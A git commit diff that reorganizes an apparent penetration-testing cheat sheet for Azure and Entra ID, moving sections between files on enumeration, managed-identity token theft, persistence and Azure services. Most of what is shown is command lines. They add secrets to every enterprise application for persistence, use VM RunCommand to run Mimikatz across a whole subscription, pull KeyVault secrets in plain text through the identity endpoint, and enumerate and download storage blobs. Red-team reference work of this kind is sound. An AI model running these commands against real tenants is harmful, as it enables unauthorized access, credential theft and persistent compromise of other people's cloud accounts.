Devices and Services
parent
f7bd9bb527
commit
d3b66447cd
|
@ -14,14 +14,6 @@
|
||||||
* [Stealing Tokens](#stealing-tokens)
|
* [Stealing Tokens](#stealing-tokens)
|
||||||
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
|
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
|
||||||
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
|
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
|
||||||
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
|
|
||||||
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
|
|
||||||
* [Azure Storage Blob](#azure-storage-blob)
|
|
||||||
* [Enumerate blobs](#enumerate-blobs)
|
|
||||||
* [SAS URL](#sas-url)
|
|
||||||
* [List and download blobs](#list-and-download-blobs)
|
|
||||||
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
|
|
||||||
* [KeyVault Secrets](#keyvault-secrets)
|
|
||||||
* [Pass The Certificate](#pass--the-certificate)
|
* [Pass The Certificate](#pass--the-certificate)
|
||||||
* [Pass The PRT](#pass-the-prt)
|
* [Pass The PRT](#pass-the-prt)
|
||||||
* [Intunes Administration](#intunes-administration)
|
* [Intunes Administration](#intunes-administration)
|
||||||
|
@ -188,81 +180,6 @@
|
||||||
```
|
```
|
||||||
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
|
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
|
||||||
|
|
||||||
|
|
||||||
## Enumeration
|
|
||||||
|
|
||||||
## Enumeration methodology
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Check Azure Joined
|
|
||||||
PS> dsregcmd.exe /status
|
|
||||||
+----------------------------------------------------------------------+
|
|
||||||
| Device State |
|
|
||||||
+----------------------------------------------------------------------+
|
|
||||||
AzureAdJoined : YES
|
|
||||||
EnterpriseJoined : NO
|
|
||||||
DomainJoined : NO
|
|
||||||
Device Name : jumpvm
|
|
||||||
|
|
||||||
# Enumerate resources
|
|
||||||
PS Az> Get-AzResource
|
|
||||||
|
|
||||||
# Enumerate role assignments
|
|
||||||
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
|
|
||||||
|
|
||||||
# Get info on a role
|
|
||||||
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
|
|
||||||
|
|
||||||
# Get info user
|
|
||||||
PS AzureAD> Get-AzureADUser -ObjectId <ID>
|
|
||||||
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
|
|
||||||
|
|
||||||
# List all groups
|
|
||||||
PS AzureAD> Get-AzureADGroup -All $true
|
|
||||||
|
|
||||||
# Get members of a group
|
|
||||||
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
|
|
||||||
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
|
|
||||||
|
|
||||||
# Get Azure AD information
|
|
||||||
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
|
|
||||||
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
|
|
||||||
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
|
|
||||||
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
|
|
||||||
|
|
||||||
# Check if there is a user logged-in to az cli
|
|
||||||
PS> az ad signed-in-user show
|
|
||||||
|
|
||||||
# Check AppID Alternative Names/Display Name
|
|
||||||
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
|
|
||||||
|
|
||||||
|
|
||||||
# Get all application objects registered using the current tenant
|
|
||||||
PS AzureAD> Get-AzureADApplication -All $true
|
|
||||||
|
|
||||||
# Get all details about an application
|
|
||||||
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
|
|
||||||
|
|
||||||
# List all VM's the user has access to
|
|
||||||
PS Az> Get-AzVM
|
|
||||||
PS Az> Get-AzVM | fl
|
|
||||||
|
|
||||||
# Get all function apps
|
|
||||||
PS Az> Get-AzFunctionApp
|
|
||||||
|
|
||||||
# Get all webapps
|
|
||||||
PS Az> Get-AzWebApp
|
|
||||||
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
|
|
||||||
|
|
||||||
# List all storage accounts
|
|
||||||
PS Az> Get-AzStorageAccount
|
|
||||||
PS Az> Get-AzStorageAccount | fl
|
|
||||||
|
|
||||||
# List all keyvaults
|
|
||||||
PS Az> Get-AzKeyVault
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Token from Managed Identity
|
## Token from Managed Identity
|
||||||
|
|
||||||
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
|
||||||
|
@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph
|
||||||
* Users can save tokens using `Save-AzContext`
|
* Users can save tokens using `Save-AzContext`
|
||||||
|
|
||||||
|
|
||||||
## Add credentials to all Enterprise Applications
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Add secrets
|
|
||||||
PS > . C:\Tools\Add-AzADAppSecret.ps1
|
|
||||||
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
|
|
||||||
|
|
||||||
# Use secrets to authenticate as Service Principal
|
|
||||||
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
|
|
||||||
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
|
|
||||||
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Spawn SSH for Azure Web App
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
|
||||||
```
|
|
||||||
|
|
||||||
## Azure Storage Blob
|
|
||||||
|
|
||||||
* Blobs - `*.blob.core.windows.net`
|
|
||||||
* File Services - `*.file.core.windows.net`
|
|
||||||
* Data Tables - `*.table.core.windows.net`
|
|
||||||
* Queues - `*.queue.core.windows.net`
|
|
||||||
|
|
||||||
### Enumerate blobs
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
|
|
||||||
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
|
||||||
Found Storage Account - testsecure.blob.core.windows.net
|
|
||||||
Found Storage Account - securetest.blob.core.windows.net
|
|
||||||
Found Storage Account - securedata.blob.core.windows.net
|
|
||||||
Found Storage Account - securefiles.blob.core.windows.net
|
|
||||||
```
|
|
||||||
|
|
||||||
### SAS URL
|
|
||||||
|
|
||||||
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
|
||||||
* Click on **Open Connect Dialog** in the left menu.
|
|
||||||
* Select **Blob container**.
|
|
||||||
* On the **Select Authentication Method** page
|
|
||||||
* Select **Shared access signature (SAS)** and click on Next
|
|
||||||
* Copy the URL in **Blob container SAS URL** field.
|
|
||||||
|
|
||||||
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
|
||||||
|
|
||||||
### List and download blobs
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS Az> Get-AzResource
|
|
||||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
|
||||||
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
|
|
||||||
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
|
||||||
```
|
|
||||||
|
|
||||||
## Virtual Machine RunCommand
|
|
||||||
|
|
||||||
Requirements:
|
|
||||||
* `Microsoft.Compute/virtualMachines/runCommand/action`
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Get Public IP of VM : query the network interface
|
|
||||||
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
|
|
||||||
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
|
|
||||||
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
|
|
||||||
|
|
||||||
# Execute Powershell script on the VM
|
|
||||||
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
|
|
||||||
|
|
||||||
# Connect via WinRM
|
|
||||||
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
|
||||||
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
|
|
||||||
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
|
|
||||||
PS C:\Tools> Enter-PSSession $sess
|
|
||||||
```
|
|
||||||
|
|
||||||
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# List available VMs
|
|
||||||
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
|
|
||||||
ResourceGroupName Name
|
|
||||||
----------------- ----
|
|
||||||
TESTRESOURCES Remote-Test
|
|
||||||
|
|
||||||
# Execute Powershell script on the VM
|
|
||||||
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
|
|
||||||
```
|
|
||||||
|
|
||||||
Against the whole subscription using MicroBurst.ps1
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
Import-module MicroBurst.psm1
|
|
||||||
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## KeyVault Secrets
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# keyvault access token
|
|
||||||
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
|
||||||
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
|
||||||
|
|
||||||
# connect
|
|
||||||
PS> $token = 'eyJ0..'
|
|
||||||
PS> $keyvaulttoken = 'eyJ0..'
|
|
||||||
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
|
|
||||||
|
|
||||||
# query the vault and the secrets
|
|
||||||
PS Az> Get-AzKeyVault
|
|
||||||
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
|
|
||||||
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
|
|
||||||
```
|
|
||||||
|
|
||||||
## Pass The PRT
|
## Pass The PRT
|
||||||
|
|
||||||
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
|
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
|
||||||
|
|
|
@ -1,5 +1,19 @@
|
||||||
# Azure AD Tokens
|
# Azure AD Tokens
|
||||||
|
|
||||||
|
## Connection
|
||||||
|
|
||||||
|
After a successfull authentication, you will get an access token.
|
||||||
|
|
||||||
|
* az cli
|
||||||
|
* Azure AD Powershell
|
||||||
|
* Az Powershell
|
||||||
|
* External HTTP API
|
||||||
|
* Internal HTTP API
|
||||||
|
```ps1
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Access Token
|
## Access Token
|
||||||
|
|
||||||
|
|
|
@ -9,10 +9,21 @@
|
||||||
## Users
|
## Users
|
||||||
|
|
||||||
* List users: `Get-AzureADUser -All $true`
|
* List users: `Get-AzureADUser -All $true`
|
||||||
* Enumerate groups: `Get-AzureADGroup -All $true`
|
* Enumerate groups
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# List groups
|
||||||
|
Get-AzureADGroup -All $true
|
||||||
|
|
||||||
|
# Get members of a group
|
||||||
|
Get-AzADGroup -DisplayName '<GROUP-NAME>'
|
||||||
|
Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
|
||||||
|
```
|
||||||
|
|
||||||
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
|
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
|
||||||
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
|
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
|
||||||
* Add user to a group
|
* Add user to a group
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
$groupid = "<group-id>"
|
$groupid = "<group-id>"
|
||||||
$targetmember = "<user-id>"
|
$targetmember = "<user-id>"
|
||||||
|
@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Device State
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
PS> dsregcmd.exe /status
|
||||||
|
+----------------------------------------------------------------------+
|
||||||
|
| Device State |
|
||||||
|
+----------------------------------------------------------------------+
|
||||||
|
AzureAdJoined : YES
|
||||||
|
EnterpriseJoined : NO
|
||||||
|
DomainJoined : NO
|
||||||
|
Device Name : jumpvm
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Join Devices
|
### Join Devices
|
||||||
|
|
||||||
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
||||||
|
|
|
@ -20,16 +20,19 @@
|
||||||
|
|
||||||
* Federation with Azure AD or O365
|
* Federation with Azure AD or O365
|
||||||
```powershell
|
```powershell
|
||||||
|
Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
|
||||||
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
|
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
|
||||||
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
|
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
|
||||||
```
|
```
|
||||||
* Get the Tenant ID
|
* Get the Tenant ID
|
||||||
```powershell
|
```powershell
|
||||||
|
Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
|
||||||
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
|
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
|
||||||
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
|
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Enumerate Email
|
### Enumerate Email
|
||||||
|
|
||||||
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
|
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
|
||||||
|
@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Ve
|
||||||
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
|
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
|
||||||
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
|
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
|
||||||
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
|
||||||
```
|
```
|
||||||
|
@ -80,13 +84,33 @@ Subdomain Service
|
||||||
|
|
||||||
* Using Az Powershell module
|
* Using Az Powershell module
|
||||||
```powershell
|
```powershell
|
||||||
|
# Enumerate resources
|
||||||
PS Az> Get-AzResource
|
PS Az> Get-AzResource
|
||||||
PS Az> Get-AzVM | fl
|
|
||||||
|
# List all VM's the user has access to
|
||||||
|
PS Az> Get-AzVM
|
||||||
|
|
||||||
|
# Get all webapps
|
||||||
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
|
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
|
||||||
|
|
||||||
|
# Get all function apps
|
||||||
PS Az> Get-AzFunctionApp
|
PS Az> Get-AzFunctionApp
|
||||||
PS Az> Get-AzStorageAccount | fl
|
|
||||||
|
# List all storage accounts
|
||||||
|
PS Az> Get-AzStorageAccount
|
||||||
|
|
||||||
|
# List all keyvaults
|
||||||
PS Az> Get-AzKeyVault
|
PS Az> Get-AzKeyVault
|
||||||
|
|
||||||
|
# Get all application objects registered using the current tenant
|
||||||
|
PS AzureAD> Get-AzureADApplication -All $true
|
||||||
|
|
||||||
|
# Enumerate role assignments
|
||||||
|
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
|
||||||
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
|
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
|
||||||
|
|
||||||
|
# Check AppID Alternative Names/Display Name
|
||||||
|
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
|
||||||
```
|
```
|
||||||
|
|
||||||
* Using az cli
|
* Using az cli
|
||||||
|
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Azure Persistence
|
||||||
|
|
||||||
|
## Add secrets to application
|
||||||
|
|
||||||
|
* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
|
||||||
|
```powershell
|
||||||
|
PS > . C:\Tools\Add-AzADAppSecret.ps1
|
||||||
|
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
* Use secrets to authenticate as Service Principal
|
||||||
|
```ps1
|
||||||
|
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
|
||||||
|
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
|
||||||
|
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
|
||||||
|
```
|
|
@ -1,6 +1,52 @@
|
||||||
# Azure Services
|
# Azure Services
|
||||||
|
|
||||||
## Azure Runbook
|
## Virtual Machine
|
||||||
|
|
||||||
|
### RunCommand
|
||||||
|
|
||||||
|
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
* `Microsoft.Compute/virtualMachines/runCommand/action`
|
||||||
|
|
||||||
|
* List available Virtual Machines
|
||||||
|
```powershell
|
||||||
|
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
|
||||||
|
ResourceGroupName Name
|
||||||
|
----------------- ----
|
||||||
|
TESTRESOURCES Remote-Test
|
||||||
|
```
|
||||||
|
|
||||||
|
* Get Public IP of VM by querying the network interface
|
||||||
|
```powershell
|
||||||
|
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
|
||||||
|
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
|
||||||
|
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Execute Powershell script on the VM, like `adduser`
|
||||||
|
```ps1
|
||||||
|
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
|
||||||
|
PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
* Finally you should be able to connect via WinRM
|
||||||
|
```ps1
|
||||||
|
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
||||||
|
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
|
||||||
|
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
|
||||||
|
Enter-PSSession $sess
|
||||||
|
```
|
||||||
|
|
||||||
|
Against the whole subscription using `MicroBurst.ps1`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Import-module MicroBurst.psm1
|
||||||
|
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Runbook
|
||||||
|
|
||||||
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
|
|
||||||
|
@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure Service Principal
|
## Service Principal
|
||||||
|
|
||||||
* Generate a new service principal password/secret
|
* Generate a new service principal password/secret
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## KeyVault
|
||||||
|
|
||||||
|
* Keyvault access token
|
||||||
|
```powershell
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
|
||||||
|
```
|
||||||
|
|
||||||
|
* Connect with the access token
|
||||||
|
```ps1
|
||||||
|
PS> $token = 'eyJ0..'
|
||||||
|
PS> $keyvaulttoken = 'eyJ0..'
|
||||||
|
PS> $accid = '2e...bc'
|
||||||
|
PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken
|
||||||
|
```
|
||||||
|
|
||||||
|
* Query the vault and the secrets
|
||||||
|
```ps1
|
||||||
|
PS Az> Get-AzKeyVault
|
||||||
|
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName>
|
||||||
|
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Azure Storage Blob
|
||||||
|
|
||||||
|
* Blobs - `*.blob.core.windows.net`
|
||||||
|
* File Services - `*.file.core.windows.net`
|
||||||
|
* Data Tables - `*.table.core.windows.net`
|
||||||
|
* Queues - `*.queue.core.windows.net`
|
||||||
|
|
||||||
|
### Enumerate blobs
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
|
||||||
|
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
||||||
|
Found Storage Account - redacted.blob.core.windows.net
|
||||||
|
```
|
||||||
|
|
||||||
|
### List and download blobs
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS Az> Get-AzResource
|
||||||
|
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||||
|
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
|
||||||
|
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
|
||||||
|
```
|
||||||
|
|
||||||
|
### SAS URL
|
||||||
|
|
||||||
|
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
||||||
|
* Click on **Open Connect Dialog** in the left menu.
|
||||||
|
* Select **Blob container**.
|
||||||
|
* On the **Select Authentication Method** page
|
||||||
|
* Select **Shared access signature (SAS)** and click on Next
|
||||||
|
* Copy the URL in **Blob container SAS URL** field.
|
||||||
|
|
||||||
|
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
||||||
|
|
||||||
|
|
||||||
|
## Azure Web App
|
||||||
|
|
||||||
|
### SSH Connection
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Azure Devops
|
## Azure Devops
|
||||||
|
|
||||||
* Verify the validity of an Azure Personal Access Token (PAT)
|
* Verify the validity of an Azure Personal Access Token (PAT)
|
||||||
|
|
Loading…
Reference in New Issue